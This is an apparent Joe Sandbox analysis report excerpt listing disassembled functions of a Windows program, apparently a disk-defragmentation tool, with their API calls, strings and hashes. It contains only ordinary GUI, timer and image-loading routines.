                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Timer$Kill
                                                                                                                                                                                                                                                                                                • String ID: 3401028$3401029
                                                                                                                                                                                                                                                                                                • API String ID: 3307318486-3858196228
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                                • Instruction ID: 02bff0ae68159748c7f69b0dc43338cfbe1eaa20307d0c92b455edf88c414399
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 481184B574470097C3209B64DC81FEAB3A56F88750F20871FF26FA72D1C7A4B8419788
                                                                                                                                                                                                                                                                                                Function 00402590 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402044$8F$CPUIdleTime
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-857541521
                                                                                                                                                                                                                                                                                                • Opcode ID: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                                • Instruction ID: 11bcaded1eea4243ffe6df52d9d88ed76b2ab53cb2a3c081b775842c2c83da62
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1182B1644601AFD314DF14DD85FAAB7A4FF48B20F10862EF55EA32D0DB78A844CB59
                                                                                                                                                                                                                                                                                                Function 0046C4F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • BeginDeferWindowPos.USER32(?), ref: 0046C51A
                                                                                                                                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0046C576
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0046C58F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Defer$BeginRedraw
                                                                                                                                                                                                                                                                                                • String ID: Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 2284443614-1860365581
                                                                                                                                                                                                                                                                                                • Opcode ID: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                                • Instruction ID: 5655fd99f899ac16fa463449df691d44eb2f3411b94b0263f5d23efcf872a4b1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21EDB4600702AFC310CF29C984A16FBE4BB88310F148A5EE59997261E734F945CB96
                                                                                                                                                                                                                                                                                                Function 00402660 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402045$8F$CPUUsageExceed
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3685332712
                                                                                                                                                                                                                                                                                                • Opcode ID: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                                • Instruction ID: ba179efc8f1fc514a3e2d6bea4a1845afbd83289b5d047454f20136ff34bde4d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB1191B1644601BFD310DF14DD85FAAB7A8FF48B14F108A2EF55EA22D0DB78A844CB59
                                                                                                                                                                                                                                                                                                Function 0041E1D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • mciSendCommandW.WINMM ref: 0041E210
                                                                                                                                                                                                                                                                                                • mciGetErrorStringW.WINMM(00000000,?,00000080,00000001,00000001,?), ref: 0041E23D
                                                                                                                                                                                                                                                                                                • mciSendCommandW.WINMM(00000001,00000806,00010000,?), ref: 0041E26C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CommandSend$ErrorString
                                                                                                                                                                                                                                                                                                • String ID: %s/n
                                                                                                                                                                                                                                                                                                • API String ID: 1543859921-1476993579
                                                                                                                                                                                                                                                                                                • Opcode ID: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                                • Instruction ID: bb7bdc0f92cc2694eaa6ee34f7bcc843a23ee59e2d49304dadf9c875fa4d5d80
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04118671504301BBD360EB54DC46FEFB7E8AF88714F00492EF589D7290E67495588796
                                                                                                                                                                                                                                                                                                Function 004014C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50filewindowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: EnterCriticalSection.KERNEL32(00497DC0,00000000,?,?,?,?,?,004014CD,?,?), ref: 00401199
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: GdiplusStartup.GDIPLUS(00497DBC,?,?,?,?,?,?,?,004014CD,?,?), ref: 004011CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,004014CD,?,?), ref: 004011DD
                                                                                                                                                                                                                                                                                                • GdipCreateBitmapFromFile.GDIPLUS ref: 004014FA
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(?), ref: 0040152C
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 00401559
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Gdip$CriticalDisposeImageSection$BitmapCreateEnterFileFromGdiplusLeaveStartup
                                                                                                                                                                                                                                                                                                • String ID: >=
                                                                                                                                                                                                                                                                                                • API String ID: 1500692541-3263226258
                                                                                                                                                                                                                                                                                                • Opcode ID: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a3b4bfc414dc10881e7eec236f3a1e04021e9235cedc72d475739dca07e05aa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C01A5725043119BC710EF18D885AEFB7E8BFC4358F04892EF588AB260D738DA09C796
                                                                                                                                                                                                                                                                                                Function 0041C260 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32 ref: 0041C29B
                                                                                                                                                                                                                                                                                                • #354.SHLWAPI(?,00000002,00000000), ref: 0041C2C8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Time$#354FileSystem
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\AutoDefragmention$LastDefragmention
                                                                                                                                                                                                                                                                                                • API String ID: 253409978-3598614746
                                                                                                                                                                                                                                                                                                • Opcode ID: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                                • Instruction ID: a0b1e6286b276bc7d887fd98d5a7f5957222b11053583dbd66c01ec11ac0fb83
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4115276508701DFD300EF54DD85B9A7BE4FB48720F404A2EF156C22E1EB74A548CB56
                                                                                                                                                                                                                                                                                                Function 00467260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _TrackMouseEvent.COMCTL32(?), ref: 004672A8
                                                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 004672BA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004672CD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CaptureEventMessageMouseReleaseSendTrack
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 3622949717-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: 0839e7c7c7d8c9402484c13060e54e3869cf2a4a1aa44a0847cf5f14f67a6ab6
                                                                                                                                                                                                                                                                                                • Instruction ID: 456561867f921ab06e727ae592dfca2a3a58b3b413725f8460958233fe91f338
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0839e7c7c7d8c9402484c13060e54e3869cf2a4a1aa44a0847cf5f14f67a6ab6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B012C705087019FD320DF38D849B5BBBE4BB48718F108A2EF49992290E7B49584CF96
                                                                                                                                                                                                                                                                                                Function 004150A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415169), ref: 004150B0
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004150C1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 004150DB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_Draw
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-2074868843
                                                                                                                                                                                                                                                                                                • Opcode ID: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                                • Instruction ID: 64c332f81b35f2aaac3873e7666c404af8577304093a8f0924de00557a4645c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0D474601B01CFD7608FA9D988A43BBE4BB58715B50C82EE59AC3A00D778F480CF04
                                                                                                                                                                                                                                                                                                Function 00415240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415319,?,?,BB40E64E,?,?,00000000,BB40E64E,?,BB40E64E,?,00000000,00000000), ref: 00415253
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00415264
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 0041527E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_GetImageInfo
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-158344479
                                                                                                                                                                                                                                                                                                • Opcode ID: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                                • Instruction ID: f55cdba9153e0e1c980a4fac1fe1aa85c7dcce68075fab81bff91a96374b76ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EF0B275A00B41DFDB208FB8D848B82B7E4AB58715F00C82EA5AEC3611D738E480CF14
                                                                                                                                                                                                                                                                                                Function 004153C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415489,?,?,BB40E64E,?,?,00000000,004070E8,?,BB40E64E,?,00000000,00000000), ref: 004153D0
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004153E1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 004153FB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ImageList_GetImageCount, xrefs: 004153F5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
